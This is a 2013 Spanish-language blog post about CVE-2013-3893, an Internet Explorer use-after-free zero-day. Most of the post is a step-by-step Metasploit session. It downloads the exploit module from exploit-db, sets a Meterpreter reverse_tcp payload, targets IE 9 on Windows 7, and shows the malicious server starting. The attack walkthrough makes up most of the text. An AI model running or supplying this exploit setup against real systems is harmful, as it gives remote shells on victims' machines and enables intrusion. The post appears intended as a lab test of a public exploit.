un nuevo 0-day en Internet Explorer que se estaba utilizando en varios ataques dirigidos. FireEye
confirmó que se estaba utilizando desde julio-agosto contra varias
organizaciones de Japón dentro de lo que denominó operación "Deputy dog" debido a que dicha frase se encontraba entre el código del exploit.
La vulnerabilidad asociada al CVE-2013-3893 es de tipo use-after-free en memoria y permite la ejecución remota de código debido a una mala implementación de SetMouseCapture en mshtml.dll que afecta a todas las versiones de IE de la 6 a la 11. El exploit además utiliza una combinación de heap spraying y el módulo ‘mscorie.dll’ para evadir DEP y ASLR.
Lo malo (o lo bueno) es que el lunes publicó un módulo en Metasploit para explotarlo y Microsoft de momento sólo ha publicado un Fix-it
para solucionarlo. Es decir, al no incluir una actualización automática
en Windows Update la única contramedida actual es la instalación manual
del parche o la distribución del msi a través de SCCM/Altiris... y ya
sabéis lo esto significa: ¡millones y millones de PCs en todo el mundo vulnerables!
Ante tal nicho de mercado sólo nos queda afilarnos los dientes y probarlo :P
root@kali:~/# wget http://www.exploit-db.com/download/28682
root@kali:~/# mv 28682 /usr/share/metasploit-framework/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
root@kali:~/# msfconsole
=[ metasploit v4.7.0-2013092501 [core:4.7 api:1.0]
+ -- --=[ 1196 exploits - 726 auxiliary - 200 post
+ -- --=[ 312 payloads - 30 encoders - 8 nops
msf > use exploit/windows/browser/ie_setmousecapture_uaf
msf exploit(ie_setmousecapture_uaf) > set srvhost 192.168.177.128
srvhost => 192.168.177.128
msf exploit(ie_setmousecapture_uaf) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ie_setmousecapture_uaf) > set lhost 192.168.177.128
lhost => 192.168.177.128
msf exploit(ie_setmousecapture_uaf) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
1 IE 9 on Windows 7 SP1 with Microsoft Office 2007 or 2010
msf exploit(ie_setmousecapture_uaf) > set target 1
target => 1
msf exploit(ie_setmousecapture_uaf) > show options
Module options (exploit/windows/browser/ie_setmousecapture_uaf):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.177.128 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 192.168.177.128 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 IE 9 on Windows 7 SP1 with Microsoft Office 2007 or 2010
msf exploit(ie_setmousecapture_uaf) > [*] Using URL: http://192.168.177.128:8080/fyfa4sovCnSmvK7
[*] Server started.
[*] 192.168.177.1 ie_setmousecapture_uaf - Checking target requirements...
[*] 192.168.177.1 ie_setmousecapture_uaf - Using Office 2010
ROP chain
fuente:hackplayers
sábado, 5 de octubre de 2013
Suscribirse a:
Comentarios de la entrada (Atom)
Buscar este blog
mrgansomer. Con tecnología de Blogger.
0 comentarios:
Publicar un comentario